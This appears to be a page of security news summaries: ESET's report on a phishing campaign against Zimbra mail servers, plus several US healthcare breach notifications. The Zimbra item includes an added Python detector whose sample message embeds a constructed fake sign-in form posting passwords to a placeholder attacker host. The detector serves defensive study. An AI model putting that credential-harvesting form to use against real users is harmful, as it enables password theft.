Massive Phishing Campaign Targets Zimbra Collaboration Email Servers
ESET researchers have discovered a massive and ongoing phishing campaign targeting Zimbra Collaboration email servers of small and medium-sized enterprises and government organizations. The campaign has been active since April and is being carried out worldwide, with Ecuador, Italy, and Poland the most attacked countries. The campaign does not appear to be aimed at any particular vertical.
The attacker sends the target an email message with an HTML attachment. The email tells the user that the email server is being updated or that Zimbra has an issue such as a pending security update, and the From field makes it appear that an email server administrator sent the message. The user is instructed to open the HTML file, which is reached through a URL pointing to a local file path. The HTML attachment contains the targeted company's logo, the company's name, and a bogus sign-in page with the username already prefilled, so the user only has to type in their password. When the password is entered, the credentials are sent in an HTTPS POST request to a server controlled by the attacker.
The ESET researchers observed a number of phishing emails being sent from some of the companies targeted in the campaign, which indicates that the attacker obtained administrator credentials and was able to create additional mailboxes on the server. The researchers state that in these cases the same password was likely used for the email account and the administrator account. Although this campaign is not technically sophisticated, it has proven successful. Because the HTML attachments contain legitimate code and only a single URL pointing to a malicious host, and that URL sits in the attachment rather than in the message body, the emails may not be recognized as malicious and are likely to get past antispam policies, particularly since the targeted companies are generally small-to-medium-sized enterprises that are unlikely to have sophisticated email security protection. ESET was unable to determine which attacker is responsible for the campaign.
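A mail-gateway check for the pattern described above, written here as an added example that is not part of the ESET report: it parses a message, looks at HTML attachments only, and flags any form that carries a password field and posts to a host outside the sender's domain. The message, the sender domain and the collector host are constructed placeholders.

```python
# Added example (not from the ESET report): flag HTML e-mail attachments whose
# sign-in form posts a password to a host outside the sender's own domain.
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample message; "victim.example" and "collector.invalid" are placeholders.
SAMPLE_EML = """\
From: "Mail Admin" <admin@victim.example>
To: user@victim.example
Subject: Zimbra security update
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please open the attached file to complete the update.

--b1
Content-Type: text/html; name="update.html"
Content-Disposition: attachment; filename="update.html"

<html><body><img src="logo.png"><h2>Victim Corp</h2>
<form method="post" action="https://collector.invalid/zimbra/login">
<input type="text" name="username" value="user@victim.example">
<input type="password" name="password">
<input type="submit" value="Sign in"></form></body></html>
--b1--
"""

FORM_RE = re.compile(r'<form[^>]*action=["\']([^"\']+)["\']', re.I)
PASSWORD_RE = re.compile(r'<input[^>]*type=["\']password["\']', re.I)

def find_credential_forms(raw_eml: str) -> list[dict]:
    """One finding per HTML attachment whose form posts a password field off-domain."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    sender_domain = parseaddr(msg["From"])[1].split("@")[-1].lower()
    findings = []
    for part in msg.iter_attachments():          # skips the plain body part
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        if not PASSWORD_RE.search(html):         # no password prompt: not a sign-in page
            continue
        for action in FORM_RE.findall(html):
            host = (urlparse(action).hostname or "").lower()
            # Relative actions have no host; anything off the sender's domain is suspect.
            if host and not host.endswith(sender_domain):
                findings.append({"attachment": part.get_filename(),
                                 "post_host": host, "sender_domain": sender_domain})
    return findings

if __name__ == "__main__":
    for f in find_credential_forms(SAMPLE_EML):
        print(f"credential form in {f['attachment']} posts to {f['post_host']}")
```

A real deployment would also check the sending host against the organization's own mail relays, since the campaign relays mail through compromised mailboxes on the victim server.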
Morris Hospital & Healthcare Centers Informs 249,000 Individuals Concerning a Cyberattack in April
Morris Hospital & Healthcare Centers in Illinois has begun notifying 248,943 people about a cyberattack that was discovered on April 4, 2023. Upon discovery of the breach, third-party cybersecurity specialists were engaged to investigate the incident and determine its nature and extent. It was confirmed that unauthorized individuals exfiltrated files containing protected health information (PHI) from its systems.
The stolen files contained the PHI of present and past patients, workers, and their beneficiaries or dependents. The PHI included names, addresses, birth dates, account numbers, medical record numbers, diagnostic/treatment codes, and Social Security numbers. Although there was no misuse of the stolen information reported, impacted persons were instructed to be careful and use the free identity theft resolution services that were provided.
The breach notification letters issued by Morris Hospital & Healthcare Centers did not say who the attackers were or what the nature of the cyberattack was. Nevertheless, the Royal ransomware group has claimed responsibility for the attack and listed Morris Hospital on its dark web data leak site on May 22, 2023, along with some of the data stolen in the attack.
Lost or Stolen DEXA Scan Backup Drive of Jefferson Health
Jefferson Health has recently begun notifying patients of its Cherry Hill Hospital in New Jersey about the compromise of some of their PHI. A backup drive containing the data was connected to its DEXA scan device. During routine maintenance, its vendor found that the backup drive was missing. An investigation failed to locate the drive, and it is presumed lost or stolen.
The backup drive contained names, birth dates, study dates, medical record numbers, and, for some persons, mailing addresses. The device also held other data, but that data cannot be viewed without the right credentials and the proper software and equipment. It included diagnoses, telephone numbers, insurance information, Social Security numbers, driver's license numbers, and scans. Jefferson Health is reviewing and improving its security practices to prevent similar incidents in the future.
The incident has not yet been posted on the breach portal of the HHS' Office for Civil Rights, so the number of affected persons is presently unknown.
Ransomware Attack on Pathways to Wellness Medication Clinics
Patients of Pathways to Wellness Medication Clinics in Oakland, Union City, and Pleasanton, California, have been notified about the exposure of some of their PHI in a cyberattack that was discovered on March 28, 2023. An unauthorized person gained access to and damaged its systems. Independent cybersecurity specialists investigated the breach and secured the systems. Technical safeguards were evaluated and are being upgraded to better protect patient information.
Although no report of patient data misuse had been received as of July 5, 2023, data theft is considered likely. The compromised data included: first and last name, address, medical insurance information, provider name, birth date, gender, and Social Security number. Affected persons were offered free single-bureau credit monitoring services. The Office for Civil Rights breach portal has no entry for the incident yet, so the number of persons affected is still unknown.
CentroMed Informs 350,000 People About PHI Compromise
El Centro Del Barrio, dba CentroMed, based in San Antonio, TX, has notified 350,000 individuals about the potential compromise of some of their PHI in a hacking incident that was discovered on June 12, 2023. The forensic investigation confirmed that unauthorized individuals accessed some of its IT systems on June 9, 2023. The hackers also accessed files containing PHI, and data theft cannot be ruled out. The affected files included the data of present and past patients, workers, employee and provider partners, spouses, and dependents.
The affected patient information included names, addresses, birth dates, financial account details, medical record numbers, medical insurance plan member IDs, claims information (such as any diagnoses detailed on claims), and Social Security numbers. Worker and spouse/partner/dependent information consisted of names, financial account data, medical insurance plan member IDs, claims information, and Social Security numbers. Notification letters were mailed to affected persons starting on August 11, 2023. CentroMed stated that additional safeguards and technical security measures have been implemented to prevent similar breaches in the future.